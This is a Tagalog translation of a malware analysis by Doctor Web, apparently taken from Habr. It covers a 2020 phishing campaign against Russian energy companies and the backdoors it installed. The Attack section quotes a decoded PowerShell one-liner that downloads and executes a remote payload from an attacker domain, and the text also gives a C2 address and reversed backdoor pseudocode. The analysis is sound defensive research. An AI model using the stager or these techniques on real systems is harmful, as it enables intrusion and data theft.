Ang aming karanasan sa pagsisiyasat sa mga insidente sa seguridad ng computer ay nagpapakita na ang email ay isa pa rin sa mga pinakakaraniwang channel na ginagamit ng mga umaatake upang paunang tumagos sa mga inatakeng imprastraktura ng network. Ang isang walang ingat na aksyon na may kahina-hinalang (o hindi masyadong kahina-hinala) na sulat ay nagiging entry point para sa karagdagang impeksyon, kaya naman aktibong gumagamit ang mga cybercriminal ng mga pamamaraan ng social engineering, kahit na may iba't ibang antas ng tagumpay.
Sa post na ito gusto naming pag-usapan ang tungkol sa aming kamakailang pagsisiyasat sa isang spam campaign na nagta-target sa ilang negosyo sa Russian fuel at energy complex. Sinundan ng lahat ng mga pag-atake ang parehong senaryo gamit ang mga pekeng email, at walang sinuman ang tila naglagay ng labis na pagsisikap sa nilalaman ng teksto ng mga email na ito.
Katalinuhan
Nagsimula ang lahat sa katapusan ng Abril 2020, nang makakita ang mga analyst ng virus ng Doctor Web ng spam campaign kung saan nagpadala ang mga hacker ng na-update na direktoryo ng telepono sa mga empleyado ng ilang negosyo sa Russian fuel at energy complex. Siyempre, hindi ito isang simpleng pagpapakita ng pag-aalala, dahil hindi totoo ang direktoryo, at ang mga dokumentong .docx ay nag-download ng dalawang larawan mula sa malalayong mapagkukunan.
Na-download ang isa sa mga ito sa computer ng user mula sa news[.]zannews[.]com server. Kapansin-pansin na ang domain name ay katulad ng domain ng anti-corruption media center ng Kazakhstan - zannews[.]kz. Sa kabilang banda, ang domain na ginamit ay agad na nagpapaalala sa isa pang kampanya noong 2015 na kilala bilang TOPNEWS, na gumamit ng ICEFOG backdoor at may mga Trojan control domain na may substring na "balita" sa kanilang mga pangalan. Ang isa pang kawili-wiling tampok ay kapag nagpapadala ng mga email sa iba't ibang mga tatanggap, ang mga kahilingan na mag-download ng isang imahe ay gumagamit ng alinman sa magkaibang mga parameter ng kahilingan o mga natatanging pangalan ng imahe.
Naniniwala kami na ito ay ginawa para sa layunin ng pagkolekta ng impormasyon upang matukoy ang isang "maaasahang" addressee, na pagkatapos ay garantisadong magbubukas ng sulat sa tamang oras. Ang SMB protocol ay ginamit upang i-download ang imahe mula sa pangalawang server, na maaaring gawin upang mangolekta ng NetNTLM hash mula sa mga computer ng mga empleyado na nagbukas ng natanggap na dokumento.
At narito ang sulat mismo na may pekeng direktoryo:
Noong Hunyo ng taong ito, nagsimulang gumamit ang mga hacker ng bagong domain name, sports[.]manhajnews[.]com, para mag-upload ng mga larawan. Ipinakita ng pagsusuri na ang mga subdomain ng manhajnews[.]com ay ginamit sa mga spam mail mula noong Setyembre 2019 man lang. Ang isa sa mga target ng kampanyang ito ay isang malaking unibersidad sa Russia.
Gayundin, noong Hunyo, ang mga tagapag-ayos ng pag-atake ay nakabuo ng isang bagong teksto para sa kanilang mga liham: sa pagkakataong ito ang dokumento ay naglalaman ng impormasyon tungkol sa pag-unlad ng industriya. Malinaw na ipinahiwatig ng teksto ng liham na ang may-akda nito ay alinman sa hindi katutubong nagsasalita ng Ruso, o sadyang lumilikha ng gayong impresyon tungkol sa kanyang sarili. Sa kasamaang palad, ang mga ideya ng pag-unlad ng industriya, gaya ng dati, ay naging isang pabalat lamang - ang dokumento ay muling nag-download ng dalawang larawan, habang ang server ay binago upang i-download ang[.]inklingpaper[.]com.
Ang susunod na pagbabago ay sumunod noong Hulyo. Sa pagtatangkang i-bypass ang pagtuklas ng mga nakakahamak na dokumento ng mga antivirus program, nagsimulang gumamit ang mga attacker ng mga dokumento ng Microsoft Word na naka-encrypt na may password. Kasabay nito, nagpasya ang mga umaatake na gumamit ng isang klasikong pamamaraan ng social engineering - abiso ng gantimpala.
Ang teksto ng apela ay muling isinulat sa parehong istilo, na pumukaw ng karagdagang hinala sa hinarap. Ang server para sa pag-download ng imahe ay hindi rin nagbago.
Tandaan na sa lahat ng kaso, ang mga electronic mailbox na nakarehistro sa mail[.]ru at yandex[.]ru na mga domain ay ginamit upang magpadala ng mga liham.
Pag-atake
Sa unang bahagi ng Setyembre 2020, oras na para kumilos. Ang aming mga analyst ng virus ay nagtala ng isang bagong alon ng mga pag-atake, kung saan ang mga umaatake ay muling nagpadala ng mga liham sa ilalim ng pagkukunwari ng pag-update ng isang direktoryo ng telepono. Gayunpaman, sa pagkakataong ito ang attachment ay naglalaman ng malisyosong macro.
Kapag binubuksan ang naka-attach na dokumento, lumikha ang macro ng dalawang file:
- VBS script %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, na nilayon upang maglunsad ng batch file;
- Ang batch file mismo ay %APPDATA%configstest.bat, na na-obfuscate.
Ang kakanyahan ng gawain nito ay nagmumula sa paglulunsad ng Powershell shell na may ilang mga parameter. Ang mga parameter na ipinasa sa shell ay na-decode sa mga utos:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Tulad ng mga sumusunod mula sa mga utos na ipinakita, ang domain kung saan na-download ang payload ay muling ibinabalat bilang isang site ng balita. Isang simple , na ang tanging gawain ay tumanggap ng shellcode mula sa command at control server at isagawa ito. Natukoy namin ang dalawang uri ng backdoors na maaaring i-install sa PC ng biktima.
BackDoor.Siggen2.3238
Ang una ay BackDoor.Siggen2.3238 β ang aming mga espesyalista ay hindi pa nakatagpo noon, at wala ring pagbanggit sa program na ito ng ibang mga antivirus vendor.
Ang program na ito ay isang backdoor na nakasulat sa C++ at tumatakbo sa 32-bit na Windows operating system.
BackDoor.Siggen2.3238 ay magagawang makipag-ugnayan sa server ng pamamahala gamit ang dalawang protocol: HTTP at HTTPS. Ang nasubok na sample ay gumagamit ng HTTPS protocol. Ang sumusunod na User-Agent ay ginagamit sa mga kahilingan sa server:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Sa kasong ito, ang lahat ng mga kahilingan ay ibinibigay kasama ang sumusunod na hanay ng mga parameter:
%s;type=%s;length=%s;realdata=%send
kung saan ang bawat linyang %s ay katumbas na pinapalitan ng:
- ID ng nahawaang computer,
- uri ng kahilingan na ipinadala,
- haba ng data sa realdata field,
- datos.
Sa yugto ng pagkolekta ng impormasyon tungkol sa nahawaang sistema, ang backdoor ay bumubuo ng isang linya tulad ng:
lan=%s;cmpname=%s;username=%s;version=%s;
kung saan ang lan ay ang IP address ng infected na computer, ang cmpname ay ang computer name, ang username ay ang user name, ang bersyon ay ang linya 0.0.4.03.
Ang impormasyong ito na may sysinfo identifier ay ipinadala sa pamamagitan ng isang POST na kahilingan sa control server na matatagpuan sa https[:]//31.214[.]157.14/log.txt. Kung bilang tugon BackDoor.Siggen2.3238 tumatanggap ng HEART signal, ang koneksyon ay itinuturing na matagumpay, at ang backdoor ay nagsisimula sa pangunahing cycle ng komunikasyon sa server.
Mas kumpletong paglalarawan ng mga prinsipyo ng pagpapatakbo BackDoor.Siggen2.3238 ay nasa ating .
BackDoor.Whitebird.23
Ang pangalawang programa ay isang pagbabago ng BackDoor.Whitebird backdoor, na alam na natin mula sa insidente sa isang ahensya ng gobyerno sa Kazakhstan. Ang bersyon na ito ay nakasulat sa C++ at idinisenyo upang tumakbo sa parehong 32-bit at 64-bit na Windows operating system.
Tulad ng karamihan sa mga programa ng ganitong uri, BackDoor.Whitebird.23 idinisenyo upang magtatag ng isang naka-encrypt na koneksyon sa control server at hindi awtorisadong kontrol ng isang nahawaang computer. Naka-install sa isang nakompromisong sistema gamit ang isang dropper .
Ang sample na sinuri namin ay isang nakakahamak na library na may dalawang pag-export:
- Google-play
- Pagsusulit.
Sa simula ng trabaho nito, dine-decrypt nito ang configuration na naka-hardwired sa backdoor body gamit ang algorithm batay sa XOR operation na may byte 0x99. Ang pagsasaayos ay mukhang:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Upang matiyak ang patuloy na operasyon nito, binabago ng backdoor ang halaga na tinukoy sa field oras ng trabaho mga pagsasaayos. Ang field ay naglalaman ng 1440 byte, na kumukuha ng mga halaga 0 o 1 at kumakatawan sa bawat minuto ng bawat oras sa araw. Lumilikha ng hiwalay na thread para sa bawat interface ng network na nakikinig sa interface at naghahanap ng mga packet ng pahintulot sa proxy server mula sa nahawaang computer. Kapag nakita ang naturang packet, nagdaragdag ang backdoor ng impormasyon tungkol sa proxy server sa listahan nito. Bilang karagdagan, sinusuri ang pagkakaroon ng isang proxy sa pamamagitan ng WinAPI InternetQueryOptionW.
Sinusuri ng programa ang kasalukuyang minuto at oras at inihahambing ito sa data sa field oras ng trabaho mga pagsasaayos. Kung ang halaga para sa kaukulang minuto ng araw ay hindi zero, kung gayon ang isang koneksyon ay itinatag sa control server.
Ang pagtatatag ng koneksyon sa server ay ginagaya ang paglikha ng isang koneksyon gamit ang TLS version 1.0 protocol sa pagitan ng client at ng server. Ang katawan ng backdoor ay naglalaman ng dalawang buffer.
Ang unang buffer ay naglalaman ng TLS 1.0 Client Hello packet.
Ang pangalawang buffer ay naglalaman ng mga TLS 1.0 Client Key Exchange packet na may key na haba na 0x100 bytes, Change Cipher Spec, Encrypted Handshake Message.
Kapag nagpapadala ng Client Hello packet, ang backdoor ay nagsusulat ng 4 na byte ng kasalukuyang oras at 28 bytes ng pseudo-random na data sa Client Random na field, na kinakalkula tulad ng sumusunod:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Ang natanggap na packet ay ipinadala sa control server. Ang tugon (Server Hello packet) ay sumusuri:
- pagsunod sa TLS protocol na bersyon 1.0;
- sulat ng timestamp (ang unang 4 na byte ng Random Data packet field) na tinukoy ng kliyente sa timestamp na tinukoy ng server;
- tugma ng unang 4 na byte pagkatapos ng timestamp sa Random Data field ng client at server.
Sa kaso ng mga tinukoy na tugma, ang backdoor ay naghahanda ng isang Client Key Exchange packet. Para magawa ito, binabago nito ang Public Key sa package ng Client Key Exchange, pati na rin ang Encryption IV at Encryption Data sa Encrypted Handshake Message package.
Pagkatapos ay tinatanggap ng backdoor ang packet mula sa command at control server, tinitingnan kung ang bersyon ng TLS protocol ay 1.0, at pagkatapos ay tumatanggap ng isa pang 54 byte (ang katawan ng packet). Kinukumpleto nito ang pag-setup ng koneksyon.
Mas kumpletong paglalarawan ng mga prinsipyo ng pagpapatakbo BackDoor.Whitebird.23 ay nasa ating .
Konklusyon at konklusyon
Ang pagsusuri sa mga dokumento, malware, at imprastraktura na ginamit ay nagbibigay-daan sa amin na sabihin nang may kumpiyansa na ang pag-atake ay inihanda ng isa sa mga Chinese APT group. Isinasaalang-alang ang paggana ng mga backdoor na naka-install sa mga computer ng mga biktima kung sakaling matagumpay na pag-atake, ang impeksiyon ay humahantong, sa pinakamababa, sa pagnanakaw ng kumpidensyal na impormasyon mula sa mga computer ng mga inatakeng organisasyon.
Bilang karagdagan, ang isang napaka-malamang na senaryo ay ang pag-install ng mga dalubhasang Trojan sa mga lokal na server na may espesyal na function. Ito ay maaaring mga domain controller, mail server, Internet gateway, atbp. Gaya ng makikita natin sa halimbawa , partikular na interesado ang mga naturang server sa mga umaatake sa iba't ibang dahilan.
Pinagmulan: www.habr.com